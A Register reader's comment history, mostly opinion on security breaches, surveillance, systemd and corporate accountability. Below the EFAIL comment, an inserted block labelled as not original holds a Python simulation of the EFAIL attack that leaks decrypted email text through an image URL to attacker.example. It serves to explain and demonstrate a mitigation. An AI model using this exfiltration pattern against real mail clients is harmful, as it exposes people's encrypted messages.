* Posts by Kabukiwookie

123 posts • joined 8 Dec 2017


Vengeful sacked IT bod destroyed ex-employer's AWS cloud accounts. Now he'll spend rest of 2019 in the clink


Re: Voova should take some heat here...

But, but it's in the cloud.



Maybe this guy is completely innocent...

Huawei CFO poutine cuffs by Canadian cops after allegedly busting sanctions on Iran


Re: China is not a democracy

China can do all those things and a lot worse. So whatever you might think of western democracy, it's a hell of a lot better in the rights department than China.

On the other hand, China is not the one shouting from the rooftops that they're the protector of Freedom and Democracy(tm) either.

Russia: We did not hack the US Democrats. But if we did, we're immune from prosecution... lmao


Re: They are Russian

It's one thing to argue that the Western Allies' diplomatic failure in Eastern Europe forced the Soviets to make their own arrangements with Germany. It's another to justify helping to arm the German war machine while they were fighting Britain and France - particularly stupid given that it was likely to be turned on them next.

It's just as dumb as the British secretly supporting the fascists in Spain during their civil war, while depriving the republicans of the arms to defend themselves. This whole diplomacy thingy is based on opportunism, and that goes for all parties; the western 'Allies' were doing exactly the same. If my future adversary is busy fighting someone other than me, that will give me time to get my own house in order before it's my turn.

Please spare me the 'holier than thou' attitude.


Re: Wikileaks and Trump?

There is the evidence

Really? Please post some links that do not point to people repeating non-verifiable 'news' from people who have their information from 'reliable sources' or a TLA stating they have 'high confidence' such a thing happened without actually disclosing any real information beyond 'trust me we know, but we can't show you the evidence, because of... eh National Security, yep. National Security'. The very same TLAs that had 'high confidence' about WMDs in Iraq.

I know how many examples of actual evidence you can produce; exactly zero.

It's hearsay and people repeating hearsay and more people thinking that as long as enough people repeat it, it becomes true.


Re: Wikileaks and Trump?

It's possible Assange may have thought he had a deal with Trump, but - like many others before him - he's since realised what that's worth.

Now I am confused, who the conspiracy theorists are supposed to be again?

Is it the ones that think that Assange will be picked up by the US govt, taking into account previous actions from that particular govt like breaking international law by forcing the landing of a diplomatic airplane carrying the Bolivian president, because there was a chance that Edward Snowden was on board... along with an extensive track record of false flags to start conflicts and 'interventions' by toppling foreign democratically elected governments?


Is it the ones peddling 'Trump colluded with Wikileaks and Russia', for which we can show the following overwhelming proof ... >sound of crickets<

Nixon should have thought of blaming the Russians when Woodward and Bernstein investigated Watergate. If Watergate had happened now, both journalists would probably be incarcerated instead of receiving a Pulitzer.

Guess who's back, back again? China's back, hacking your friends: Beijing targets American biz amid tech tariff tiff


It sounds like many companies have been paying lip service to the security around their IP

That's because non-technical people have no clue about IT and are not willing to spend money on what appears to work 'just fine' automagically. The whole premise of securing a physical gold storage facility is much easier to understand than setting up proper user authentication.

I am encountering more and more often that even people working in IT seem to know the 'magic incantations' to get something done, but have no idea what those incantations actually do, nor what any side effect of those incantations may be. On top of that, they often don't even seem to be actually interested in anything except 'making stuff work'.

Bloodbath as Broadcom slashes through CA Technologies personnel


Re: As ye sow, so shall ye reap


CA, where good software goes to die.

DXC: Everything is going to plan, too well in fact... we've chopped so many staff, our IT projects are now behind


Re: hahahahahahahahahaha - pull the other one, it's got bells on.

let's see what we get told on Thursday.......

Working for DXC eh? You have my sympathy.

Dutch cops hope to cuff 'hundreds' of suspects after snatching server, snooping on 250,000+ encrypted chat texts


Re: New???

Although I agree with the general sentiment, they also could have just grabbed the customer list and listened in on their conversations in the 'traditional' way using a directional microphone and a court order to monitor a person suspected of committing a crime.

This wholesale grab of all data just rubs me the wrong way.

Someone like Snowden could be using this service and, with the Dutch government usually bending over backwards to US interests, it wouldn't surprise me if this were abused.

Russian computer failure on ISS is nothing to worry about – they're just going to turn it off and on again


Re: Which computers is this?

Moving to a version that uses systemd can hardly be called an 'upgrade'.

GitHub.com freezes up as techies race to fix dead data storage gear


Re: If Only....

The issue is probably human error. Probably a misconfiguration or alerts that were ignored or not received at all, because infrastructure is easy and any developer who can bang two lines of Java together automatically knows everything there is to know about infrastructure as well.

That's the Devops way.

Linux kernel 'give me root, now' security hole sighted, dubbed 'Mutagen Astronomy'


Re: Thanks for clarifying.

Sometimes small words, talking slowly and repetition isn't enough to guarantee understanding.

That's because you forgot to add 'louder' to that list...

'World's favorite airline' favorite among hackers: British Airways site, app hacked for two weeks


Re: We take the protection of our customers’ data very seriously.

fining a company some large percentage of their global takings is a pretty decent incentive.

Fines will be borne by the company, which will translate them into its costs. This means that with the large oligopolies that we currently have, the customer eventually pays for the f**k-ups of poor management.

I am not saying CTOs should immediately go to jail without any investigation, but if their Security Officer has been warning the CTO time and time again that things need to be improved and the CTO doesn't act, the CTO did not perform his/her 'due diligence'. This should be at the very least a fire-able offence without pay / golden parachute.

The issue I have with this is that even if this happens (it does not), that incompetent previous C-level manager will happily start working somewhere else at the same level, due to his golf-buddies and f**k things up there.

Jail time seems to be the only way to actually get the message across. It doesn't even have to be years (I am actually against long incarceration), but even a few months being deprived of their freedom will quickly change not only their perception of the seriousness of the job, it will also change the perception of the next board looking to hire C-level managers.

I have no problem with competent managers being compensated properly. I have a problem with bumbling fools being elevated above their capabilities, f**king up things for all employees in the company, then moving on to the next one using their golden parachute.


Re: We take the protection of our customers’ data very seriously.

Now, if the *developer* was to go to jail for errant and grossly negligent practices (i.e. using off-the-shelf code and libraries, externally hosted or not, with zero understanding or care of the potential implications), then perhaps these f**k-ups wouldn't happen at all.

Most of these f**k-ups only happen because with every IT project, corners are being cut to meet arbitrary deadlines (often linked with bonuses for management for finishing early/under budget).

As it stands we have a market flooded by f**k-ups who think they're able to manage a project, who are paid well over £600/day, but are too moronic to listen to the highly paid experts when they tell them not to cut any corners. Only a poor craftsman blames his tools.


Re: We take the protection of our customers’ data very seriously.

If you somehow think imposing this level of penalty would magically make everyone write every line of code from scratch, including the OS, and CPU microcode, to ensure every single byte has been thoroughly inspected, then you misunderstand how business works.

Of course it would not magically happen, it would require real work. Things 'magically happen' because someone else will take care of it is the current way of thinking, where C-level management is absolved from any wrongdoing, because they're 'not able' to control what everyone else in the company is doing.

The key term here is 'due diligence'. Right now a lot of top management has no interest in ensuring they do a good job, since they are able to hide behind the excuse that they can't control what's happening on the lower rungs in the company.

misunderstand how business works.

I understand very well how businesses (and their internal politics) currently work and I also understand quite well what it would take to make them work well. You however don't seem to understand human nature.

Without an incentive to actually get off their ass, nothing will happen. Since larger and larger carrots don't seem to work, maybe it's time to apply the stick.


Re: We take the protection of our customers’ data very seriously.

No-one in their right mind would take a CTO job if this was the case.

You mean, nobody who doesn't know anything about security, how to enforce it and check that subordinates are indeed implementing said security would take the job.

And that's exactly the purpose.

Someone who cannot ensure that subordinates are doing what they're supposed to be doing should not be in any position of power. C-level management requires a person to have leadership skills, not being best golf-buddies with members of the board.


Re: We take the protection of our customers’ data very seriously.

We take the protection of our customers’ data very seriously.

They just leave out the bit ', but not enough to spend any serious money on it, since damage control if something happens is still cheaper for us than actually making sure your data is secure'.

These things will not change until C-level management is made directly responsible if things like this go wrong.

Data breach? CTO goes to jail.

Problem will fix itself within the next 6 months.

No, eight characters, some capital letters and numbers is not a good password policy



This is good advice:



Re: Over Your Head

This is why any Security Officer should be reporting directly to either the CEO and/or board of directors.

What usually happens is that the person responsible for security winds up attempting to shove shit uphill,

When's a backdoor not a backdoor? When the Oz government says it isn't


Re: Question:

Simple. Alice goes to jail or gets fined $50,000.

Facebook's security boss is offski. Not to worry, it has 'embedded security' in all divisions


Re: A great start

My thoughts exactly.

What are the chances that any of the embedded security people gets cut off at the knees when complaining about a security issue that needs to be fixed that endangers the delivery date of a new feature?

Without a direct connection to C-level management, any push for security will be doomed to fail.

Bank on it: It's either legal to port-scan someone without consent or it's not, fumes researcher


Re: They are running code in my machine without my explicit consent for their own benefit...

Law supersedes any wording in private contracts if the private contract breaks the law.

FBI boss: We went to the Moon, so why can't we have crypto backdoors? – and more this week


Re: Eggs out of pancakes

Literally, the signal-to-noise of what they want plummets the second that you capture ordinary people in the loop

That presumes that the real reason is an attempt to capture the 'bad guys'. Problem with that again is that the definition of 'bad guys' is constantly shifting.

US voting systems (in Oregon) potentially could be hacked (11 years ago) by anybody (in tech support)


Re: Security through obscurity?

It's Symantec, did you have any other expectation?

Russia's national vulnerability database is a bit like the Soviet Union – sparse and slow


Re: Two Russia cyber stories ..

Can't imagine why anyone would have a negative view of Putin

It's just that a lot of people are tired as fsck of articles with a lot of whataboutery. For some reason, you don't see similar articles about US-run sites like CERT, which for instance completely lacks any mention of where Stuxnet originates from (who'd have thunk it), but you don't see articles being written pointing this out (and that's good, because it would be just as useful as an article pointing out that water is wet).

Everybody already knows that each government has their own intelligence machine and their own political motivations to point out what their 'enemies' are doing because they're evil.

Please keep technical articles technical.

And btw; insinuating that anyone complaining about this sort of thing is a putinbot is so last year.

AAAAAAAAAA! You'll scream when you see how easy it is to pwn unpatched HPE servers


Re: Home-written HTTP servers

That's why I always use my Bash HTTP Server.


Banks told: Look, your systems WILL fail. What is your backup plan?


stopping free banking for the general public.

Which part of the planet do you live where the general public gets 'free banking'?


Re: Having backup plans is good.

Management listening to their SMEs regarding what are best practices is essential.

The problem is usually cutting corners to meet ridiculous arbitrary project deadlines.

Another staffer at mega-hacked Equifax slapped with insider trading rap


Re: "... charged with insider trading – and has promised to pay back his alleged ill-gotten gains."

Only if you're C-level management.

On Kaspersky’s 'transparency tour' the truth was clear as mud


Re: Seriously?

if you don't understand the difference between a freely elected government and a government run by a pseudo-dictatorship which invades a peaceful nation and runs hundreds of thousands of people out of their homes at gunpoint.. then I believe you have a lot of research and self-reflection to do.

Indeed, the false choice in the US between a turd-sandwich and a shit-bagel can't actually be called a democracy.

Along with their long-standing tradition of overthrowing democratically elected governments in other countries they don't like, they should be stripped of their veto power in the UN.

Or is that not exactly what you had in mind?

From here on, Red Hat's new GPLv2 software projects will have GPLv3 cure for license violators


Slippery slope?

Not sure what the 'cure' term is in GPLv3, but in this extension the time in which a licence breach can be fixed is 30-60 days (if caught at all).

What's stopping all the proponents of this addition to GPLv2 from slowly extending this 'cure' term to 144 years?

♬ Finland, Finland, Finland, the country for new cloud DCs ♬


Use of public infrastructure

Aside from the fact that you're still giving your data to a US company, I hope the Finnish government is actually taxing Google, instead of giving ridiculous tax breaks.

Google is using the highly skilled workforce and public infrastructure, which is all paid for through taxes. At the very least they should contribute to Finnish society in the form of taxes, instead of leeching off of public infrastructure paid for by Finnish citizens, while moving profits to a tax haven.

Internet luminaries urge EU to kill off automated copyright filter proposal


Re: Invest in hard drives

EVERY rightsholder supply free copies (or hashes) of EVERY copyrighted work to EVERY Web site?

Free copies? No, not free. Anyone who's required to implement these measures can probably buy a solution with a hit ratio of 1%, with a forced subscription model to ensure the signature database is updated at regular intervals.

June 2018, and Windows Server can be pwned with a DNS request


Maybe MS can find some better code in Github, they can't seem to write anything that's not severely broken themselves.

Microsoft commits: We're buying GitHub for $7.5 beeeeeeellion


Re: Aladdin

They'll want to monetise it somehow

They'll have access to lots and lots of private repos, full of IP of companies doing software development.


Re: Worst thing: M$FT has now full access to our PRIVATE REPOS!!

Why else do you think MS would pay 7.5 billion USD?

This'll teach you to use any service that's owned by a US company.

With the rise of huge mega corps in the US, your data is not safe if it's stored with any US company. Even if the data is not directly stored in the US.

Stop shooting yourself in the foot and go somewhere that does take privacy seriously.

FBI fingers North Korea for two malware strains


Re: Credibility

Compulsive liars, need to prove they're not lying this time.

Interestingly, this was immediately attributed to North Korea, while if you check for Stuxnet on the same site, there's not a single link that implicates the US and/or Israel.

For some reason it looks like 'technical' statements from US Cert are highly politicised, and that should already be a reason to take anything they say with a grain of salt.

Internet engineers tear into United Nations' plan to move us all to IPv6


UN has pretty much been crippled by politics and made meaningless for a long time.

Yes it has, but the value of the UN and active participation is seriously hampered by the few countries that have 'veto' rights. This essentially means that as a non-veto country the only way you can pass any significant changes is if you make sure any proposal you want to pass is in the interest of the countries that do have veto rights.

The only way to fix this is to remove veto rights completely.

GCHQ bod tells privacy advocates: Most of our work is making sure we operate within the law


Re: "If you whack governments on privacy it will only drive the vulnerability market."

ruthless but selfish minorities.

Of course, if you look at history, it's always the minority groups with no power who abuse said lack of power.

Some people who see 'evil terrorists' in every nook and cranny, don't seem to understand how power corrupts selfish humans who should be working for the good of general population.

Folks are shocked – shocked – that CIA-backed Amazon is selling face-recog tech to US snoops, cops


All your data are belong to us

CIA-backed Amazon is selling face-recog tech to US snoops, cops

So what would be the chance that all data stored in the Amazon 'cloud' is actively being harvested by the CIA or any of the other TLAs?

US Congress mulls expanding copyright yet again – to 144 years


Re: Copyright extensions need to stop

Not only this, but copyright should only be given to natural persons, not corporations.

Agile development exposed as techie superstition


Re: Agile is b*llocks. Any non-idiot knows this.

'using the cloud' is nothing more than putting your balls in someone else's vice and hoping they know which way to twist the handle,

Utterly brilliant; I'll definitely be ripping off your comment and randomly throwing it into polite conversation.

Software development slow because 'Most of our ideas suck'


"release now and download updates/fixes later"

You mean make customers buy DLCs later, once they're already committed.


"Most of our ideas suck," he said, attributing the quote to software consultant Jeff Patton (though any cynic, unbidden, will say as much).

"But some of them are amazing," he added. "If we can try enough of these ideas out, we can play a numbers game. We can find the ideas that will really help our customers."

Isn't this essentially the same idea that if you put enough monkeys in a room with typewriters, eventually one will create a masterpiece?


So what does that say about developers that are proponents of this idea?


Re: Precious

After reading that line I thought this was a SystemD article for a short while.

S/MIME artists: EFAIL email app flaws menace PGP-encrypted chats


Re: Am I missing something?

Surely they need full access to the target users computer not just the target's email account.

No, just having the email file itself allows an attacker to modify it, resend it and have (part of) the encrypted content fed back to the attacker as a URL that attempts to connect to an HTTP-capable service owned by the attacker, due to the way that some email clients handle poorly formatted HTML in emails.

This is however only possible if the email client actively connects to URLs embedded in emails to retrieve content, and the attacker must already have access to the emails, which means either access to a user's account or access to a mail server.

The main group at risk of this may be whistleblowers and political activists targeted by nation states who have access to email servers that already contain a copy of the mail with encrypted content, and then only if they are using one of the affected email clients that allow retrieval of dynamic content in HTML-formatted mail.
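As an added example that is not part of the original comment or of the EFAIL research, the following Python simulates the shape of the attack described above: an attacker who already holds the ciphertext re-sends it sandwiched between two HTML fragments, and a client that decrypts and splices all parts into one document ends up putting the plaintext into an image URL pointing at the attacker. The host name, the sample plaintext and the 'ENC:' stand-in for real PGP/S-MIME encryption are constructed for this example; what it demonstrates is the client-side assembly and remote-content behaviour the comment describes, not the cipher.

```python
import base64
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Hypothetical attacker host and a constructed plaintext; neither comes from the post.
ATTACKER_HOST = "attacker.example"
PLAINTEXT = "Meet at the usual place at 9pm"


def toy_encrypt(plaintext: str) -> str:
    """Stand-in for PGP/S-MIME encryption: reversible and tagged so the simulated
    client can recognise an encrypted part. Not real cryptography."""
    return "ENC:" + base64.b64encode(plaintext.encode()).decode()


def toy_decrypt(blob: str) -> str:
    if not blob.startswith("ENC:"):
        raise ValueError("not an encrypted part")
    return base64.b64decode(blob[4:]).decode()


def attacker_rewrap(stolen_ciphertext: str) -> list:
    """Message the attacker re-sends to the victim: the untouched ciphertext
    between an unterminated <img src="..."> and its closing quote.
    Returns (content_type, body) pairs standing in for MIME parts."""
    return [
        ("text/html", f'<img src="http://{ATTACKER_HOST}/exfil?d='),
        ("application/pgp-encrypted", stolen_ciphertext),
        ("text/html", '">'),
    ]


class ImgSrcCollector(HTMLParser):
    """Collects every <img src> a renderer would fetch."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag == "img":
            self.srcs.extend(v for k, v in attrs if k == "src" and v)


def remote_image_urls(html: str) -> list:
    parser = ImgSrcCollector()
    parser.feed(html)
    parser.close()
    return parser.srcs


def vulnerable_client(parts) -> list:
    """Decrypts encrypted parts in place, concatenates all parts into one HTML
    document and fetches remote images: the plaintext ends up inside the URL."""
    document = "".join(
        toy_decrypt(body) if ctype == "application/pgp-encrypted" else body
        for ctype, body in parts
    )
    return remote_image_urls(document)


def hardened_client(parts, load_remote_content: bool = False) -> list:
    """Each part is parsed as its own document, so attacker HTML in one part
    cannot enclose the plaintext of another; remote loading is off by default."""
    requested = []
    for ctype, body in parts:
        document = toy_decrypt(body) if ctype == "application/pgp-encrypted" else body
        if load_remote_content:
            requested.extend(remote_image_urls(document))
    return requested


def leaks_plaintext(urls, plaintext: str) -> bool:
    """True if any URL the client would request carries the plaintext to the attacker."""
    return any(plaintext in u and urlsplit(u).hostname == ATTACKER_HOST for u in urls)


# The message as the victim's client receives it (constructed).
MESSAGE = attacker_rewrap(toy_encrypt(PLAINTEXT))

if __name__ == "__main__":
    print("spliced renderer requests:", vulnerable_client(MESSAGE))
    print("isolated renderer requests:", hardened_client(MESSAGE, load_remote_content=True))
```

Running the script prints the single URL the spliced renderer would request, with the decrypted text as its query string, and an empty request list for the isolated renderer. Both mitigations the comment implies are present in the hardened version: render each MIME part as its own document, and do not fetch remote content from encrypted mail at all.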

Home Office admits it sent asylum seeker’s personal info to the state he was fleeing


Re: AC AC Cognitive Dissonance

why should the US burden itself by taking refugees who are unskilled from "sh*thole" countries - such as Haiti 

Maybe because the US is one of the greatest 'contributors' to turning countries into 'shitholes'. Either by bombing them back to the stone age or by overthrowing democratically elected governments, because their interests conflict with the interests of the US.

You love Systemd – you just don't know it yet, wink Red Hat bods


Re: Spherical wheel is superior.

I do know that I never saw a non-distribution provided init script that handled correctly the most basic of corner cases – service already running

This only shows that you don't have much real life experience managing lots of hosts.

like application double forking when it shouldn't

If this is a problem in the init script, this should be fixed in the init script. If this is a problem in the application itself, it should be fixed in the application, not worked around by the init mechanism. If you're suggesting the latter, you should not be touching any production box.

"La, la, la, sysv is working fine on my machine, thankyouverymuch" is not what you can call "participating in discussion".

Shoving systemd down people's throats as a solution to a non-existing problem is not a discussion either; it is the very definition of 'my way or the highway' thinking.

now in the real world, people that have to deal with init systems on a daily basis

Indeed and having a bunch of sub-par developers, focused on the 'year of the Linux desktop' to decide what the best way is for admins to manage their enterprise environment is not helping.

"the dogs may bark, but the caravan moves on"

Indeed. It's your way or the highway; I thought you were just complaining about the people complaining about systemd not wanting to have a discussion, while all the while it's systemd proponents ignoring and dismissing very valid complaints.


Biting the hand that feeds IT © 1998–2019